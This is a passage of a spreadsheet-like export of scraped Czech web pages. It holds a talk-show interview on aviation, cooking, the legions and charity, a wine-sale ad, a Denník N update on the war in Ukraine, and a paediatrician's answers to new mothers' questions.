jste si nechtěl někdy udělat jako ten průkaz? Jo takhle, já jsem nerozuměl, já jsem myslel, že... jo. Ne, ne, teďka už ne, protože jak mám hrozně málo času a pokud v tom vzduchu nejste často, tak je úplná pitomost, aby člověk do toho sedl jednou za tři týdny a pět hodin se nahoře někde bál a neužil si to. Teď už bych se asi bál, no. Jiří, ty si teda chtěl být mechanikem, ale ne pilotem? No, to by mě nenapadlo nikdy a já jsem o tu nohu přišel v 11 letech, takže mně bylo jasný, že asi jako když tam člověk nemůže jít s jednou dioptrií, projít tím kurzem, tak s jednou nohou by to asi bylo ještě těžší. Takže jsem chtěl dělat leteckého mechanika a tam byl učební obor čtyřletý s maturitou, si to pamatuju tenkrát ještě za minulého režimu, někde u ruzyňský letiště a nějaká soudružka na národním výboru, která rozhodovala o tom, kdo půjde ze základní školy na jakou školu střední, tak řekla, že bez nohy nemůžu jít na učňovský obor a že musím jít na střední školu. A tenkrát mi to zamázla a já jsem byl opravdu jako fakt naštvaný strašně, protože jsem to bral jako příkoří, protože já jsem ty letadýlka, ty Spitfiry lepil téměř pořád. Já jsem přišel ze školy a furt tam smrdělo to lepidlo a furt jsem lepil ty letadýlka, miloval jsem právě tu bitvu o Anglii a tyhle ty chvíle za války, kdy se naši piloti účastnili těch důležitých bojů a tohle to bylo jako něco, co jsem chtěl dělat potom i v budoucnu. Protože mě strašně voní ten letecký kerosin a i doteďka, když někam lítám a já jsem lítal během té kariéry skoro pořád, tak stejně, když jedu kolem letiště a cítím ten spálený kerosin, tak mi to jako voní dálkou, voní mi to něčím exotickým. Takže další společná linka létání, úmyslně zvolená. Teď jdeme dál a to je opravdu tak velmi jednoduché, jestli tipnete, kdo rád vaří? No, to je velmi fikaná odpověď, nevím. Jiří Dvořáku , máte taky vášeň k vaření? Jo, já se u toho strašně uklidňuju. Já to mám tak jako specifický v tom, že já hrozně rád vařím, ale v podstatě nerad jím. Jako mě to jídlo nebaví. To jsme vás mohli poprosit, abyste nám něco uvařil a přinesl. No, tak to jste mohl, no. Tak příště. Příště.Máte oba nějakou specialitu, kterou fakt rádi děláte? Já třeba miluju boršč a naučil jsem se to podle Pohlreicha a ten je teda fantastický. Je to teda hrozná drbačka s tím, s tím borščem, ale je to výborný. Takže to třeba to dělám docela rád, když teda na to mám čas. A Jirko, o tobě jsem se taky dočetl, že rád vaříš. Mě to uklidňuje, já si tím oddělím tu část, kdy člověk přijde domů a shodí za sebe tu práci, kterou ten den dělal. To je jedno, jestli to byl dřív trénink nebo teďko nějaká práce, jeden z těch oborů, kterým se věnuju teď, a oddělím si tu dobu, než si pak doma v klidu sednu a chovám se, jako že jsem už doma ve svém prostředí, takže tohle je právě vždycky to, že připravím tu večeři a taky pro mě je důležitější ta příprava toho jídla než to, že to jim. Já to třeba nechám i vystydnout, protože mezitím ještě, jak jsem strašně jako vycepovaný z toho kola, tak já musím mít všude pořádek. Toto mě naučilo, protože my jsme na těch hotelích většinou měli málo prostoru, takže člověk si musel hned po sobě uklidit, aby nedělal bordel tomu druhému tam, takže tohle to fakt já mám, že přijdu domů, uvařím a ještě než to sním, tak to musím všechno umýt, všechno to uklidit a až když je ta linka čistá, tak si teprve vezmu to jídlo a třeba moje tchýně, která jako strašně ráda vaří, tak vždycky říká: tak si to sněz, ať to nemáš studený. A mně to nevadí, mně to je jedno. Pro mě je důležitý ten proces té přípravy jídel a jako ten boršč mě taky baví, jako to je taky taková jako. To se právě dlouho připravuje a člověk se u toho hodně uklidní. Nebo omáčky na špagety na těstoviny, to mě jako baví. Pánové, teď je tady taková soutěživá rubrika, která se jmenuje minutový valčík. Pane Dvořáku , chtěl byste být učitelem? Ne?Kandidoval byste dnes znovu na post prezidenta? Asi ne. Jste skvělý? Jistě.To je na vás, na kterého hosta nejraději vzpomínáte?Na Jiřího Dvořáka . Řekl byste o sobě, že jste úspěšný? Ano. Vzpomenete si na svou první lásku? Vzpomínám, jmenovala se Daniela. Věnujete se nějaké formě meditace? Ne. Kde jste vzal to charisma? Už od narození. Byl jste někdy za školou? Ne.Vyhořel jste někdy? Ano.Které ovoce vám nejvíc voní? Broskev.Kam pojedete v létě na dovolenou? Asi nikam.Jakou hudbu rád posloucháte ve volném čase? Pink Floyd . Co byste vzkázal svému mladšímu já? Ať neblbne.Máte nějaký neobvyklý zlozvyk? Kouření. Byl jste šikovný student? Ne.Máte radši hořkou nebo kyselou kávu? Kávu nepiju.S jakou fiktivní postavou bys rád udělal rozhovor? S Freddie Mercurym , ale ten není fiktivní. Jaký je váš nejoblíbenější film? Anděl Páně. Jak vnímáte komentáře hejterů? Mažu je.Nechtěl byste něco zrežírovat? Ne. Kdy jste si naposledy zatančil? Včera.Oblíbené brněnské slovo?Šalina. Kafe s mlékem. 23? Jste první! To, jestli někdo trumfne. Asi už dva nebo tři měsíce ten počet 21 byl nedosažitelný. Tak děkuju a gratuluju. Zvládli jste to skvěle. Vy, Jiří, mluvíte teď v posledních letech často a rád a já jsem za to moc rád, protože to taky vnímám za velmi důležité, o našich legionářích, o tom, že když jste o nich byl průvodcem dokumentu České televize právě o českých legionářích, tak že jste si vlastně i uvědomil, jak málo o nich víme, jak vlastně samozřejmě i za komunistů se na to kašlalo, protože to taky popisujete v těch rozhovorech, z logických důvodů, prostě pro komunisty to asi nebylo téma, ale vlastně mě zajímá, proč jako pořád dnes, 35 let po revoluci, je to tak jako opomíjené téma? Proč o nich víme tak málo? No, proč o nich víme tak málo? Jen poměrně jednoduchá odpověď. To padá na vrub školství, jako já, když to řeknu, a nechci opravdu nikoho urazit, tak proč já bych se měl učit o pazourcích a o nějakým paleolitu dva, tři roky a jako současný dějiny, nebo minimálně třeba 100 let zpátky, tak na to mám půl roku. A mě spíš zajímá i vzhledem k tomu, co se děje teďka ve světě, tak jako co se odehrálo třeba v Rusku 1905, 1917, co se odehrálo v roce 1938, 1948, 1945, 1968, 1989. A tohle se mají ty děti učit, protože z toho, jak se říká, že národ, který zapomene svou historii, je nucený opakovat a ono se to bohužel děje, to je prostě tahle věta není zbytečná. A tohle ty děcka by si měly uvědomit, aby se naučily myslet, protože já myslím, že, jak říkal pan Werich, že myšlení má budoucnost, tak opravdu vykašlat se na ty povrchní věci, který jsou bohužel teďka čím dál tím častější, ale podívat se do té historie, protože ta historie jim mnohdy může naplánovat jejich přítomnost a jejich budoucnost, protože právě jsou to ty souvislosti. Při té současné situaci v Evropě , ve světě. Kladete si otázku, jako co byste byli ochotni obětovat za vlast, za národ, za republiku? To je strašně těžká otázka, protože nikdo to neví, nikdo to neví, dokud se do té situace nedostane. To je to samý, jako když jsme točili operace Silver A o druhé světové válce, atentát na Heydricha atd. Tam někdo říkal nebo byli takový jako: já, kdybych se dostal na gestapo, tak dnes nikoho neprozradím. Nikdo to nemůže říct. Nikdo neví, co tam se dělo za šílený věci. Takže já doufám, že všechno, že bych dokázal obětovat všechno. Vidíme to teďka na tý Ukrajině , co ty kluci jako dělají, a to je neuvěřitelný, za jakých podmínek oni jako ty Rusáky jako držej. Ale dělají to, protože to je to, co měli ti legionáři, a proto mě tak fascinujou, že to je to vlastenectví a neplést si to s nacionalismem, to je jako velmi důležitá věc. A jako nebýt těch legií, tak Československo neexistuje, jako to se taky jako moc neví. Taky se moc neví, to hodně Pražanů vůbec neví, že Vítkov nahoře, tak je v podstatě muzeum československých legií . To, že tam ležel potom Gottwald, který se jim tam rozpadl, tak si většina lidí myslí, že to je nějaké bývalé komunistické mauzolem. To tak není, to bylo postavený jako oslava tady těchto těch chlapů.Takže to vlastenectví a doufám, že v každým z nás je aspoň trochu a že kdyby tahle země přišla do nějakého průšvihu, tak to nějak zase vyplave nahoru a že ten národ se semkne, ale aspoň já v to věřím. Jiří, jak to máš ty? Protože když člověk pozoruje to, co se děje, bohužel, kousek od našich hranic, jak Rusko napadlo a okupuje cizí zemi, tak mě vždycky ty otázky napadají a právě to, co jste říkal, jako děsí mě ta odpověď, na kterou ani nechci znát tu odpověď, nechci vědět, jak bych se musel nebo nemusel zachovat, ale napadají tě taky tyhle věci, když člověk samozřejmě sleduje zprávy a vnímá to, co se děje kolem nás? No, samozřejmě. A pro mě vždycky i třeba v těch věcech, který jsem dělal, ať to byl sport nebo dneska dělám, tak člověk pořád hledá nějakou inspiraci, hledá důvod, proč být lepší důvod, proč se chovat tak, jak si myslím, že bych se chovat měl a tam je strašně důležitý pro mě dvě zkušenosti. Ta historická, což bylo pro mě třeba to studium tý historie té druhý světový války a to, jak se chovali právě třeba naši piloti statečně. Už jenom ta cesta, než oni se dostali do té Anglie , co všechno museli obětovat, museli tady nechat svoje rodiny, museli tady nechat vlastně všechno. A jak s nimi potom zametli, žejo? A potom ta nespravedlnost po tom návratu, tak tyhle ty přesně jak obrovský hrdinství, tak ty obrovský nespravedlnosti. Je Jedno, jestli to bylo po druhé světové válce, ten nástup komunismu nebo ty nespravedlnosti, co se tady děly po těch nadějných letech té první republiky, a pak najednou s tím nástupem toho nacismu tady jakoby do Československa , tak to jsou věci, že si člověk říká, jak strašně se dobře máme teď, že tohle to vlastně před těmito rozhodnutími nemusíme stát my, ale zároveň je v tom ta důvěra, že kdyby to nastalo, tak vždycky tady byli statečný lidi a že tu inspiraci mám v tom, že já bych chtěl být taky takovej. Nevím, jak bych se zachoval, ale aspoň tu vůli, že bych to chtěl zkusit, protože jsem to viděl v té historii a ta druhá zkušenost, kterou mi nabídl ten sport, že jsem fakt procestoval opravdu celý svět, že jenom málo zemí na světě, kde jsem nebyl jenom proto, že tam fakt nejsou žádný závody nebo mě tam nezavál žádný závod. A tam člověk úplně stejně taky vidí, jak se tady v Evropě máme dobře a že ty problémy, který tady vidíme jako fakt těžký problémy, takže vlastně problémy nejsou a potom s tímhle, s těmito dvěma zkušenostmi, když se začne dít něco, jako se děje třeba teďko na Ukrajině , tak je člověk daleko chápavější, daleko tolerantnější a daleko možná ochotnější pomoct. Oba se také angažujete v řadě různých charitativních projektů a aktivit. Vždycky mě zajímá, podle čeho si ty aktivity vybíráte? Jaký je ten klíč, do čeho se zapojit? Protože chápu, že oba těch nabídek i těch možností musíte mít spoustu a že samozřejmě zase síly a čas taky není neomezený. Tak, Jiří, jaký ty máš ten klíč? Tak já mám pár těch aktivit jakoby dlouhodobých, to znamená, že fakt s nimi jedu třeba přes 15, 20 let a pak mám nově, vždycky každý rok si vyberu něco, na co mi ještě zbývá energie a čemu se chci věnovat, protože mě to nějakým způsobem osloví. Buď tím, kdo mě osloví, že je to někdo, na koho dám, nebo komu věřím, že když už tenhle tomu projektu věnuje svůj čas, tak že to má smysl a že vlastně tam najednou vidím i smysl sám pro sebe, anebo že to nějakým způsobem koresponduje s tím, jak lidi vnímají mě, to znamená, že jim nepřijde násilný, že zrovna já to podporuju, protože je to se mnou nějakým způsobem souvislý, ať jsou to handicapované děti nebo ať je to nějaká pomoc sportu pro to, aby třeba jsme inspirovali zdravou mládež, aby se hýbaly, aby se víc zapojovaly třeba do hodin tělocviku atd. a to jsou věci, který mi přijdou logický a když aspoň trošku toho času mám, tak se tomu snažím věnovat. Jaký je váš klíč? Já dlouhodobě taky, já spolupracuju s nadací Pink Bubble, což je nadace, která se stará o onkologicky nemocný, ale v podstatě teenagery. Je to od nějakých 11 let do 29 let. A dělá to moje kamarádka, léta dělá ředitelku Martina Šmuková , dělá to skvěle s těma holkama. A té se nedá odmítnout. A té se nedá odmítnout. Cokoliv.To je pravda. A já jsem si říkal, hele, na malý děti onkologicky nemocný dá, pardon, řeknu blbě, ale to je tak, jak já si to myslím, tak dá každý. Na starý lidi onkologický dá každý. Na ty teenagery se každý vyprdne. A tohle byl docela důvod, proč jsem do toho šel, začal se i shánět peníze. Docela se to dařilo a daří, což je bezvadný a ty děcka jsou fakt skvělý a je to i pro ty jejich rodiče, že když třeba ty děti leží v té nemocnici na nějakých chemoterapiích nebo něco takového, tak ty peníze jdou i pro ty rodiče, aby tam mohli s těma dětma být v té nemocnici a dělají s nimi výlety, ale výlety jako ne že tady do Šárky, ale jedou s nimi třeba někam do Indie nebo jedou s nimi na loď, vezmou je na loď na Jadran nebo to je jedno. A najednou člověk má pocit, že tady prostě není zbytečně, že prostě něco dělá nejen pro ty druhý, ale i taky pro sebe, protože si v podstatě uvědomíte, jak jsme tady krátce a i přesně, jak máme to štěstí, že nemáme zrovna ty problémy, které mají ty děti nebo ty lidi, to je úplně jedno, jestli jsou to děcka nebo dospělí, to je fuk. A že musíme fakt být vděčný jako za každý nový ráno, jako zaplaťpánbůh za to, a že tady je ještě pořád mír a že když můžeme, tak že můžeme pomoct. Tak pánové, abychom to zase trošku odlehčili a už se blížíme do finále, tak mě teď zajímá, co zajímá diváky tady v Café Husovka. A já j</t>
  </si>
  <si>
    <t>20241001_76_2996156490_86d130bdb5a3dc1a292a.html</t>
  </si>
  <si>
    <t>86d130bdb5a3dc1a292a</t>
  </si>
  <si>
    <t>Prodej vína k přepálení</t>
  </si>
  <si>
    <t>Prodej vína k přepálení Prodám víno 1.10.2024 Dobrý den, prodám víno na přepálení cca 400 L, cena 10 Kč. Kontaktujte mě na 792 755 871 Autor: Aleš Guldan Autor person Aleš Guldan</t>
  </si>
  <si>
    <t>20241001_77_2996225502_22277210e6c72fbfc5a1.html</t>
  </si>
  <si>
    <t>22277210e6c72fbfc5a1</t>
  </si>
  <si>
    <t>Vývoj bojů (950.&amp;nbsp;den): Osvobodili je, aby zabíjeli na Ukrajině. Ruští trestanci ale vraždí i&amp;nbsp;po návratu domů</t>
  </si>
  <si>
    <t>Vývoj bojů (950.&amp;nbsp;den): Osvobodili je, aby zabíjeli na Ukrajině . Ruští trestanci ale vraždí i&amp;nbsp;po návratu domů 1. října 2024 17:33 Ruská válka na Ukrajině Vývoj bojů Vývoj bojů (950. den): Osvobodili je, aby zabíjeli na Ukrajině . Ruští trestanci ale vraždí i po návratu domů Mirek Tóda Denník N Ruský prezident Putin podepsal nový výnos o podzimních odvodech do armády. Foto: Ruské ministerstvo obrany Tento text pro vás načetl robotický hlas. Pokud najdete chybu ve výslovnosti, dejte nám prosím vědět . Audioverze článků můžete poslouchat v rámci klubového předplatného . Plné znění audioverzí článků je dostupné pouze pro předplatitele Klubu N. Upgradujte své předplatné. Plné znění audioverzí článků je dostupné pouze pro předplatitele Klubu N. Předplaťte si ho také. Ruští novináři napočítali už skoro 500 obětí, které v Rusku zavraždili nebo těžce zranili vojáci – většinou bývalí trestanci – po návratu z fronty. Ruský prezident podepsal další kolo odvodů a režim bude znovu rekordně utrácet na obranu. V září útočil na Ukrajinu rekordní počet Šáhidů. Jeden z nich na sobě měl Starlink. Videa dne: jak Ukrajinci sestřelili ruský Mavic a zastavili útok motocyklistů. Mapa dne: kritická situace ve Vuhledaru , kam vstoupili ruští vojáci a vyvěsili ruské vlajky. Informace v tomto textu jsou shrnutím událostí za pondělí 30. září. Situace na některých místech už může být jiná. Režim osvobodil vrahy, aby bojovali. Teď se vrátili a zabíjejí dál. Když Putinovu režimu začali na Ukrajině docházet vojáci, verboval ve věznicích. Na svobodu se tak dostali odsouzení za ty nejvážnější násilné zločiny. Mnozí z nich se pak stali součástí fenoménu známého jako mlýnek na maso. Část těch, kdo nasazení na frontě přežila, pak začala terorizovat vlastní obyvatelstvo. Po návratu z fronty se totiž k násilí mnozí vrátili a v Rusku opět zabíjeli nebo mrzačili své oběti. Ruský nezávislý portál Vjorstka napočítal už téměř 500 obětí závažných zločinů, kterých se dopustili vojáci po návratu do Ruska . Ve většině případů jde o bývalé trestance. „Bývalí vězni zabíjejí častěji než ostatní vojáci – a častěji zabíjejí ženy,“ napsala Vjorstka. Za dva a půl roku ruské „speciální operace“ vinou ruských vojáků zemřelo v Rusku nejméně 242 lidí a dalších 227 utrpělo těžká zranění ohrožující život. Jak zjistil ruský portál, oběťmi se stávají zejména jejich příbuzní, známí nebo sousedé. Většinou je v pozadí násilí užívání alkoholu , které přispělo k agresivnímu chování, a často se odehrává v domácím prostředí. Jedním z příkladů, že účastníci války nejčastěji ohrožují lidi ze svého okolí, je vrah Igor Bogatnov. V lednu letošního roku přijel navštívit svého otce. Jak připomíná Vjorstka – nelíbilo se mu, že otec nahlas poslouchal hudbu, a tak se pohádali. Vzal ze stolu nůž a svého otce pobodal. Za vraždu dostal 8,5 roku v kolonii s přísným režimem. Předtím si odpykával 22letý trest za krádež a dvě vraždy. Pokud vynecháme Kostromskou oblast, kde po založení požáru v klubu Polygon vojákem Stanislavem Ionkinem zemřelo 13 lidí, napočítali ruští novináři nejvíce obětí v důsledku násilných činů ruských vojáků v Moskevské (11) a Rostovské (11) oblasti. Zabíjel i podruhé, jde opět na frontu. Případ vojáka Stanislava Ionkina stojí za zmínku. Ukazuje totiž, že i po zopakování obzvláště závažné trestné činnosti se ruští zločinci mohou na frontu znovu vrátit. Ionkin byl jedním z těch, kdo se dostali na svobodu díky válce na Ukrajině . Domů do Kostromy v centrálním Rusku se vrátil po zranění na frontě. Po hádce v nočním klubu Polygon roce 2022 způsobil výstřely ze signální zbraně požár, při kterém zemřelo 13 lidí. Přispěl k tomu i fakt, že podnik nesplňoval bezpečnostní normy. Letos byl odsouzen na 20 let, ale znovu podepsal kontrakt s armádou a měl by být nasazen na Ukrajině . Putin znovu povolává a rekordně utrácí. Verbování v ruských věznicích ale zdaleka nestačí k tomu, aby armáda stíhala doplňovat těžké ztráty za cenu pomalého postupu na Donbasu . Ruský prezident Vladimir Putin podepsal nový výnos o podzimních odvodech do armády, jejichž cílem je povolat 133 tisíc lidí ve věku od 18 do 30 let, kteří nejsou v záloze a podléhají branné povinnosti. Generální štáb i tentokrát tvrdí, že brance do války proti Ukrajině nepošle, to se ale potom ne vždy potvrdilo. Mladí odvedenci by se podle slibů neměli ocitnout ani na anektovaných ukrajinských územích či v Kurské oblasti, kterou v létě obsadili Ukrajinci. Mnozí branci se tam v srpnu dostali do ukrajinského zajetí a byli později vyměněni. Letos už Rusové podle oficiálních čísel v jarní etapě povolali 150 tisíc lidí. Rekordní výdaje na válečnou mašinerii. To, že se Putin zdaleka nechystá válku na Ukrajině ukončit, naznačuje i další rekord v ruském rozpočtu určeném na vojenské výdaje. Podle ruského serveru Bell k tomuto účelu na příští rok vyčlenil až 13,5 bilionu rublů (6,3 procenta HDP), čímž převýšil loňský rekord. Zároveň rozpočet na rok 2025 počítá s dalšími 3,5 biliony rublů na „národní bezpečnost“. Podle ISW to znamená , že Rusko v roce 2025 plánuje na „obranu“ a „bezpečnost“ vyčlenit přibližně 41 procent svých výdajů. Už v rozpočtu na předchozí rok 2024 přitom šlo na vojenské výdaje 10,4 bilionu rublů, a jak píše Meduza , už to byl v té době rekord. Tehdy se ale předpokládalo, že vojenské výdaje se v letech 2025 až 2026 sníží. To se nestalo a výdaje na obranu se nyní naopak zvýšily až o 25 procent. To vše může podle Institutu pro výzkum války omezit schopnost Kremlu udržovat válku takovým tempem, protože by to mohlo ohrozit stabilitu jeho režimu a domácí podporu. Jak americký think tank vysvětluje, vysoké výdaje na invazi na Ukrajinu mu ztížily financování sociálních programů a poskytování pobídek ke zvyšování porodnosti, aby překonal ruskou demografickou krizi. Válka dronů se stupňuje, Ukrajinci sestřelili Šáhid se Starlinkem. První podzimní měsíc zaznamenal další rekord v totální válce, kterou vede Rusko proti Ukrajině . Během září 2024 Ukrajinci každý den čelili četným útokům smrtících dronů Šáhidů. Celkově jich ruská armáda vypustila rekordních 1339, z nichž bylo podle statistiky ukrajinské armády sestřeleno 1107. V průměru tak Rusové proti Ukrajincům nasadili 44 Šáhidů denně. Nejhorší bylo 14. září, kdy vypustili 72 dronů. Útoky Šáhidy. Zdroj: Armyinform Obě strany v této válce používají stále více nových druhů dronů, ať už útočných, nebo výzvědných. Jednou z novinek posledního měsíce je Šáhid s přimontovaným Starlinkem, který nedávno sestřelili Ukrajinci, když na jejich území přiletěl přes Bělorusko . Jak informoval ředitel Centra pro boj proti dezinformacím Andrej Kovalenko, sebevražedné drony se tak mění na průzkumné s dlouhým doletem. Starlink od společnosti Elona Muska SpaceX přitom používají právě ukrajinští vojáci na frontě, aby se připojili na internet a navzájem mezi sebou komunikovali. Expert na zbraně Oleg Katkov pro ukrajinský portál NV řekl , že jde zatím o ojedinělý, ale i tak zajímavý případ. Za tisíc dolarů má tak podle něj na sobě dron vysokorychlostní přenosový kanál ve velikosti krabice od pizzy, který je navíc chráněn proti rušení a dělá z něj velmi efektivní špionážní stroj. Dá se tím například vyřešit přeprogramování řízené střely během startu. Jak ale upozorňuje Katkov, v tom, aby tento způsob mohli Rusové využívat masově, jim brání sankce. „Je pro ně velmi obtížné získat Starlinky, proto je kupují prostřednictvím třetích zemí,“ cituje NV experta. Novinka mezi drony se objevila i na ukrajinské straně. Má jít o silný dron schopný nést až 40 kilogramů výbušnin. Nazvali ho Heavy Shot a podle speciální jednotky Rubiž jím dokážou zničit i pět nepřátelských opevnění během jedné operace. Jeho problémem je, že je drahý, velký a hlučný, a proto se využívá zejména v noci. „Vícekrát se ho pokoušely sestřelit nepřátelské drony a chtěli ho zasáhnout ručními zbraněmi, ale nepodařilo se jim to,“ řekl voják z brigády, který si říká Hunter. Vzhledem k tomu, že má na sobě několik min ráže 60–120 mm nebo jinou nestandardně velkou munici, podle jeho slov u Rusů vzbuzuje strach, už když ho slyší. Videa dne 30. mechanizovaná brigáda odrazila motocyklový útok okupantů u vesnice Orichovo-Vasylivka u Bachmutu. Během útoku měli zničit 8 ze 14 útočících motocyklů. Zdroj: Militarna / YouTube Taktika útoků na motocyklech se podle ukrajinského serveru Militarnyj stala v ruské armádě populární. Jejich hlavním „úkolem je rychle se přiblížit k ukrajinským pozicím“. Takto 130. prapor teritoriální obrany shozením munice z jiného dronu zničil ruský Mavic. Prokremelský novinář Denis Kulaga natočil, jak během úniku před drony vybuchla čtyřkolka s rušičkami, na které voják ujížděl před drony v oblasti Časiv Jaru. Podle ukrajinského portálu NV na ni v obavě o svůj život vylezl s dalším vojákem, aby se chránil před FPV drony. Namísto toho však podle něj narazil na nastraženou minu na cestě a oba přitom byli zraněni. Podle ruského Kommersantu byl naopak terčem útoku dronu. ⚡Підар-воєнкор хотів познімати контент на Донбасі, але підірвався на міні👌😉 pic.twitter.com/5y6XXKoArp — Сергій Нещадим △ 🇺🇦 (@nevedimka123) September 30, 2024 Mapa dne: ruská vlajka ve Vuhledaru DeepState UA v pondělí večer potvrdil, co už dříve říkali ruští prováleční blogeři: ruské jednotky vstoupily na západní a jihozápadní okraj Vuhledaru, kde na domy připevnily ruské vlajky. 🐷Кацапи увійшли у Вугледар із заходу та півдня 😕Сьогодні виродки публікують не тільки обстріли центральної частини міста, де Сили Оборони продовжують чинити спротив, а й рух своєї піхоти у місті та у середині багатоповерхівок. В західній частині міста кацапи вивісили свої… pic.twitter.com/t5oa4dXy9X — DeepState UA (@Deepstate_UA) September 30, 2024 Podle ukrajinského projektu ostřelují nejen centrální část města, kde Ukrajinci stále kladou odpor, ale přesouvají svoji pěchotu i do města a dovnitř výškových budov. Ruské jednotky mohou podle Forbesu odříznout 72. mechanizovanou brigádu, která brání město už 20 měsíců a jejíž jednotky jsou momentálně ostřelované ze tří směrů. Jaké jsou ztráty V úterý bez aktualizace. Rusko do pondělního rána beze změny prokazatelně přišlo o 18 149 kusů těžké techniky (ve čtvrtek 18 077). Z toho 13 359 (13 277) kusů zničili Ukrajinci, 805 (806) bylo poškozeno, 1011 (1010) opustily posádky a 2974 (2974) ukořistila ukrajinská armáda. Z toho je 3424 (3408) tanků, z nichž bylo 2366 (2351) zničeno v boji. Ukrajina ztratila 6670 (6652) kusů techniky, z toho 4755 (4743) bylo zničeno, 535 (535) poškozeno, 298 (295) opuštěno a 1082 (1079) ukořistěno. Z toho je 944 (940) tanků, z nichž 661 (659) bylo zničeno v boji. Poznámka: Ani jedna ze stran pravidelně neinformuje o svých mrtvých ani o zničené technice. Ukrajina každý den zveřejňuje počty ruských obětí a zničené techniky, které nelze nezávisle ověřit. V tomto přehledu využíváme data projektu Oryx , který od začátku války vytváří seznam výhradně fotograficky doložených ztrát techniky. Autor: Mirek Tóda Autor Mirek Tóda Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>20241001_78_2996167049_049950a874a5ff83a63e.html</t>
  </si>
  <si>
    <t>049950a874a5ff83a63e</t>
  </si>
  <si>
    <t>První rok s miminkem: Odpovědi dětské lékařky na nejčastější otázky maminek</t>
  </si>
  <si>
    <t>První rok s miminkem: Odpovědi dětské lékařky na nejčastější otázky maminek Simona Procházková 1. 10. 2024 Foto: iStock.com První měsíce s novorozeným miminkem přinášejí rodičům spoustu otázek a nejistot. Co znamená apgar skóre, proč chodit na kontroly kyčlí, nebo jak poznat u miminka, že trpí alergií? Odpovědi na tyto i další otázky přináší MUDr. Alena Šebková, předsedkyně Odborné společnosti praktických dětských lékařů. [Odebírejte NOVINKY Z MAMINKY! Chci newsletter! ] Co znamená tzv. apgar skóre při narození? Apgar skóre je hodnocení životaschopnosti či bezprostřední adaptace novorozence na prostředí mimo dělohu po porodu. Hodnotí se ve třech časových úsecích – 1 minuta, 5 minut a 10 minut po porodu, a v pěti oblastech – tepová frekvence, dechová frekvence, svalové napětí, barva kůže, reakce na podráždění. Každá oblast je bodována od 0 do 2 bodů a výsledný součet ukazuje, zda je dítě v dobrém stavu (8 až 10 bodů), nebo zda vyžaduje pomoc zdravotníků a v jaké míře. VIDEO: Co je to přesně apgar skóre? Podle jakých kritérií vybírat umělou mléčnou výživu, když se z jakéhokoli důvodu nedaří kojit? Na trhu je velké množství tzv. umělých formulí, tedy mlék pro kojence, u nichž se nezdařilo kojení. Všechna musejí splňovat normy pro kojeneckou výživu. Prakticky všechna jsou obohacována vitaminy a stopovými prvky. Rozdíly mezi nimi jsou pak dány některými dalšími přídavky, jako jsou probiotika, prebiotika nebo látky na podporu rozvoje centrální nervové soustavy. Dbá se také na správné množství bílkovin jako na prevenci obezity v pozdějším věku. Před zavedením umělé formule je vhodné, aby se rodiče poradili se svým dětským praktikem, mnohdy je volba individuální. Proč je důležité chodit s novorozencem na kontroly kyčlí? Nesprávné postavení kostí tvořících kyčelní kloub řadíme mezi vrozené vady, se kterými se setkáváme poměrně často a které mohou způsobit velké obtíže a problémy na celý život – bolesti, omezení chůze, kulhání, zkrácení nožičky, rychlejší artrotické změny a další. Proto vyšetření kyčelních kloubů patří mezi tzv. screeningová, která se provádějí všem dětem již v porodnici. Včasné zachycení vady a zahájení léčby jsou totiž velmi důležité. Každé dítě by sítem ortopedických vyšetření mělo projít minimálně třikrát od narození do 12 týdnů věku, vyšetřovací metodou je především ultrazvuk. Existuje prevence syndromu náhlého úmrtí novorozence? Za SIDS neboli syndrom náhlého úmrtí kojenců se označuje stav, kdy dítě, nejčastěji do jednoho roku věku, zemře „z plného zdraví“ a důvod nelze určit. Konkrétní příčinu se doposud nepodařilo nalézt, ale k rizikovým faktorům se počítá například kouření či konzumace alkoholu během těhotenství, ale i pobyt dítěte v zakouřeném prostředí, předčasné narození, přehřívání kojence, spaní dítěte ve větší vzdálenosti od rodičů, měkká podložka, polštář při spaní, poloha při spaní na bříšku. Jako vhodnou pomůcku doporučuji maminkám monitor dechu. Poznáme u miminka, že trpí alergií? Nejčastější potravinovou alergií u dětí do tří let věku je alergie na bílkovinu kravského mléka. Většinou se projeví v prvních třech měsících věku a stejně tak většinou v batolecím věku vymizí. Příznaky bývají různé. Nejčastěji je to zvracení, průjem, stolice s hlenem a krví, kopřivka nebo ekzém, mohou to být ale i problémy dýchacích cest jako kašel, dušnost, naštěstí méně často takzvaná anafylaxe, tedy těžké, až život ohrožující stavy (otoky, porucha dýchání, těžká kopřivka). Alergii na bílkovinu kravského mléka diagnostikujeme pomocí eliminačně-expozičního testu, to znamená vysazení a opětovné nasazení po určité době. Provádí se ambulantně nebo za hospitalizace, podle intenzity projevů u dítěte. Léčbou je vysazení bílkoviny kravského mléka ze stravy a náhrada speciální mléčnou výživou. U ostatních potravinových alergií mohou být příznaky stejné, dynamika vývoje je ale jiná a mnohé trvají po celý život. Která očkování se řadí mezi tzv. nepovinná? Jsou to očkování chránící proti závažným onemocněním vyvolaným bakterií Streptococcus pneumoniae (pneumokok), dále proti závažným formám rotavirových infekcí a v neposlední řadě očkování proti meningokoku typu B, který je nejnebezpečnějším typem meningokoka v našich podmínkách. Co je rotavirová infekce a proč je nebezpečná? Vyznačuje se příznaky zánětu střevní sliznice ve smyslu zvracení a průjmu. Zvracení je velmi často hlavním příznakem, počet a objem průjmových stolic může být také velký. Dítě tudíž nedokáže přijmout a udržet dostatečné množství tekutin a může se rychle nebezpečně odvodnit. Rotavirová onemocnění jsou sice jedny z mnoha střevních infekcí, ale na druhé straně jsou nejčastější příčinou hospitalizace v kojeneckém věku. Pravděpodobnost, že dítě do svých pěti let prodělá alespoň jednou rotavirovou infekci, je prakticky stoprocentní. Onemocnění je vysoce nakažlivé, rotaviry jsou totiž odolné proti mnohým dezinfekčním prostředkům. Léčbou je v první řadě řádné zavodnění organismu. Prevencí tohoto onemocnění, především jeho závažné formy, je očkování. Příkrmy – doporučují lékaři spíše vařit doma, nebo podávat hotové skleničky? Přiznám se, že nemám žádný předpis. Když jsem měla malé děti, moc ráda bych tehdy využila skleničky, ale moji kluci nevzali do pusy ani lžičku. A moje kamarádka se naopak těšila, jak bude vše vařit, jenže její děti jí daly okamžitě najevo, že zase tak dobrá kuchařka není, a ládovaly se skleničkami ostošest. Pro komerčně připravovanou výživu platí přísné normy – musí splňovat vysokou kvalitu. Na druhou stranu, domácí strava je domácí strava, tedy za předpokladu, že se nesolí, nesladí, měla by zahrnovat zeleninu, ovoce, maso, především s obsahem železa – jehněčí, telecí, králičí. Autor: Simona Procházkova Autor person Simona Procházková</t>
  </si>
  <si>
    <t>8500</t>
  </si>
  <si>
